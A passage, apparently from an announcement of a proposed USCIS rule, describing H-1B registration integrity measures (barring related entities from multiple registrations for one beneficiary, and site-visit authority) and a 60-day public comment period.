  • Strengthening integrity measures – in addition to changing the selection process, misuse and fraud in the H-1B registration process would be reduced by prohibiting related entities from submitting multiple registrations for the same beneficiary. The rule would also codify USCIS’ authority to conduct site visits and clarify that refusal to comply with site visits may result in denial or revocation of the petition.

The 60-day public comment period starts following publication of the NPRM in the Federal Register.